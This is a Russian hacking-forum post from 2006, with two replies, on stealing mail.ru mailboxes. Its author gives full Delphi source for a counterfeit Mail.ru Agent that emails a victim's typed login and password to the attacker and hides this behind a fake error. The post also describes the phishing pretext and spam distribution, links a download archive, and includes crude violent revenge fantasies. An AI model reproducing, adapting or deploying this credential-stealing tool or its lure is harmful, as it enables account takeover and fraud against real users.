Статьи Липовый Mail.Agent берём мыльники.

Discussion in 'Статьи' started by CampeR, 27 Jun 2006.

  1. CampeR

    CampeR Elder - Старейшина

    Joined:
    21 Mar 2006
    Messages:
    26
    Likes Received:
    10
    Reputations:
    0
    Статья подготовлена: 25.06.06
    Автор: Bit-team
    сайт:www.bit-team.com


    Привет Всем!


    Сразу скажу, - статья в большей степени посвящена начинающим и не очень.
    Насколько известно, есть много способов отъёма почтовых ящиков: троянизации,СИ, брут и тому подобное.
    И два еще: известно, что 100% ящик невозможно увести, если ты, конечно, не админ того сервиса, который ломаешь(там и ломать не надо).

    Но бывают случаи, когда все-таки необходимо нагадить в душу человеку, сделавшему гавно в твой адрес! Раскинув головным мозгом,
    можно прийти к выводу, что все-таки почтовый ящик недруга можно увести, и этим самым отомстить обидчику! Ведь в интернете
    месть одного человека другому, как правило, сводится к изничтожению почтовых ящиков, асек, хаканью сайтов, ну и так - по мелочам!
    Больше-то, в принципе, ничего не сделаешь! Для тех, кому эти варианты не подходят, рекомендую найти негодяя в реальной жизни,
    оторвать ему все пальцы на руках, кроме мизинцев, чтобы в следующий раз он не так быстро печатал свои ругателства! Но это,
    конечно, только один из вариантов! Особые извращенцы могут попробовать засунуть в жопу мерзавца трансформаторную будку!
    (даже сам не знаю, как такая мысль пришла в голову).
    Продолжим.... Задача есть - сложность методологии решения зависит от отмороженности, скорее отрешенности или просто
    тупости человека, чей почтовый ящик является целью атаки. Если человек продвинут в области компьютерных технологий, то лучше
    и не пытаться развести его на то, чтобы он выслал пароль от своего почтовго ящика на другой ящик, объясняя это тем, что произошла
    солнечная буря на Марсе, из-за чего почтовый сервер потерял все пароли и ему одному требуется подтвердить свой пароль.
    Скорее всего, для таких людей подойдет вариант взлома всего почтового сервиса и рыскания в БД в поисках его пароля!
    Конечно, такой вариант - это верх профессионализма, он связан как с большим гемороем, так и с большими выгодами. Он нам не подходит!

    Идея нижеизложенного способа отъема почты хорошо подходит для людей среднего ума или средней тупости, чей почтовый ящик является целью.

    Данный способ немыслим без использования Социальной Инженерии, как в основном и все способы взлома.

    Итак, скажу сразу: СИ с применением тех. навыков - оч грозное оружие. Чем мы сегодня займемся? Мы пофантазируем и начнём кодить.Да, именно кодить.
    Выбираем почтовый сервис mail.ru (мой любимый -)) - именно ему и посвещена статья. Что мы делаем? Давайте представим, что мы сами с вами
    админы майла и хотим улучшить работу своего сервиса, сделать что-то новое и лучшее для своих пользователей, увеличить ящики, или, например,
    подключить какую-нить услугу (дал мыслю на фантазию php скрипт немного легенды, хост с рассылкой и вперед) -)) .

    Наша жертва: драгоценный mail.agent, сокращенно Mra. Почему бы не подделать его? И не выслать по аномайзеру или спам-рассыльщику с
    какого-нить далекого хоста по спам-листу или конкретным жертвам.
    В левом письме будет содержаться информация о том, что админы сервиса спят и видят сны только о том, как улучшить
    работу своей почтовой службы. И вот один из таких админов придумал новую фишку для мэйл-агента, в которой будет доступна новая
    функция, с помощью который вы сможете лично поговорить с тем сотрудником ФСБ, который читает вашу почту. НО эта функция
    доступна в мэйл-агенте только новой версии, ссылка на который будет в письме! НЕСОМНЕННО люди помчаться скачивать
    новый мэйл-агент, чтобы попросить дядьку из ФСБ, чтобы он не читал их почту или попросить его о том, чтобы он
    прочитал интересные места из переписки вашей жены и её любовника, и потом вкратце рассказал вам, какая поза для сношений
    у них самая любимая!

    Поэтому мы напишем свой собственный мэйл-агент, задача которого будет отсылать введенные
    в него реквизиты на другой почтовый ящик.
    Нам понадобиться Delphi 7, как говорят англичане, - небольшой кусочек мозгов и умение копировать.

    Ниже будет выложен исходный код с комментами:


    unit Unit1;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, StdCtrls, ExtCtrls, IdBaseComponent, IdComponent,
    IdTCPConnection, IdTCPClient, IdMessageClient, IdSMTP, Mask, idMessage, ShellAPI;

    type
    TForm1 = class(TForm)
    Image1: TImage;
    Label1: TLabel;
    Button1: TButton;
    Button2: TButton;
    Label2: TLabel;
    CheckBox1: TCheckBox;
    Label3: TLabel;
    Label4: TLabel;
    ComboBox1: TComboBox;
    Edit1: TEdit;
    IdSMTP1: TIdSMTP;
    MaskEdit1: TMaskEdit;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
    procedure Label1Click(Sender: TObject);
    procedure Label2Click(Sender: TObject);


    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    Form1: TForm1;
    implementation

    {$R *.dfm}

    procedure TForm1.Button1Click(Sender: TObject);
    var
    M: TIdMessage;
    begin
    M := TIdMessage.Create(Form1);

    M.Body.Add('Мыло:' + ' ' + Edit1.Text + '@' + ComboBox1.Text + #10#13 + #10#13 + 'Пасс:' + ' ' + MaskEdit1.Text); // тело письма
    M.From.Text := Edit1.text + '@' + ComboBox1.Text; // от кого
    M.Recipients.Add; // получателей может быть несколько
    M.Recipients.Items[0].Text := 'мыло получателя';
    // M.Recipients.Items[1].Text := 'мыло второго получателя если нужно';
    M.Subject := 'Mail.ru Agent'; // тема письма

    IdSMTP1.AuthenticationType := atLogin; // если сервер требует авторизации
    IdSMTP1.Host := 'smtp.' + ComboBox1.text; // хост сервера
    IdSMTP1.Username := Edit1.text; // логин
    IdSMTP1.Password := MaskEdit1.Text; // пасс
    IdSMTP1.Connect();
    // отправка мыла будет произведена от имени юзера
    // то есть он должен правильно заполнить логин и пасс, иначе мыло не отправится
    if IdSMTP1.Connected then
    begin
    try
    IdSMTP1.Send(M);
    Application.MessageBox('Невозможно соедениться с сервером. Проверьте настройки вашего соединия','Error!',MB_ICONERROR);
    // ошибка появится, если письмо успешно отправлено
    except
    Application.MessageBox('Неправильная пара Логин-Пароль','Error!',MB_ICONERROR);
    // ошибка появится, если юзер ввёл неправильный логин или пасс
    end;
    IdSMTP1.Disconnect;
    end;
    end;


    procedure TForm1.Button2Click(Sender: TObject);
    begin
    close;
    end;

    procedure TForm1.Label1Click(Sender: TObject);
    begin
    ShellExecute(Handle, 'open', 'http://win.mail.ru/cgi-bin/signup', nil, nil, SW_SHOWMAXIMIZED);
    end;

    procedure TForm1.Label2Click(Sender: TObject);
    begin
    ShellExecute(Handle, 'open', 'http://www.mail.ru/pages/help/92.html', nil, nil, SW_SHOWMAXIMIZED);
    end;
    end.


    Вот и все! Наш мейл-агент будет проверять почты на реально существующие (для тех, кто в танке и
    капитанов дальнего плавания - если кто-то там вбил неправильный пасс, он, как и реальный, выдаст
    ошибку "работает только с реальными мылами и пассами"). Сам же агент при вводе правильных пассов
    и мыла выдаст ошибку (её вы можете сменить сами - смотрите исходник и комменты), а тем временем
    пасики пришлются на Ваше мыло. Можете его вообще доработать и сделать настоящим работающим(если,
    конечно, найдёте исходники или напишите сами).



    Ну и скажете, что дальше? А дальше - работа на фантазию - изменяй картинку на новую версию агента,
    например, 4.8, думай к нему легенду, рассылай одиночным жертвам в чате, или автоматом через
    спам-аномайзер от Администрации mail.ru .

    P.S. На самом деле сие мероприятие, которое мы проделали, можно замутить практически с любым сервисом,
    и все получится, если ты не критически туп. Главное - это фантазия и немного технического обеспечения,
    благо его сейчас хватает. Ведь этот способ довольно прост, и того, кто попробует это и получит пассворд
    от почтового ящика своей подружки или еше кого, того прошибет десятый пот радости и ощущение эйфории
    от собственного могущества. Что не совсем правда. Но не надо забывать о том, что задумав такое негодяйское
    дело, вы совершаете грязный поступок! Думайте и помните про статьи УК РФ 272, 273!

    P.S. Возможно, кто-то скажет щас, что за чушь ты дал? Можно протроянить и все, или склеить там с ним.
    Ну хз так же интереснее-))


    Если вы заказываете ящик у кого-то на взлом, никогда не соглашайтесь с теми, кто требует предоплаты и
    говорит уверенно, что взломает за 2 дня. Уверенно пароль Вам может дать подкупленный админ самого сервиса.

    Всё остальное: картинки, иконки, сам целый исходник и пример самого мейл-агента можно будет в нижеприведенном
    архиве (проверено!! вирей нет -))

    http://www.bit-team.com/scripts/mra.rar





    (C) 2006 bit-team.com
     
  2. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    увмдев заголовок, сразу побежал менять пассы на мыле, т.к. пробовал недавно подключаться к реальному мылу, а мен говорят, типа такого нет. хех успел
     
  3. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Эхх, у меня такая же фигня уже месяц лежит, не знаю не юзал, но заставить запустить троян легче, чем мрагента, да еще вписать свои данные.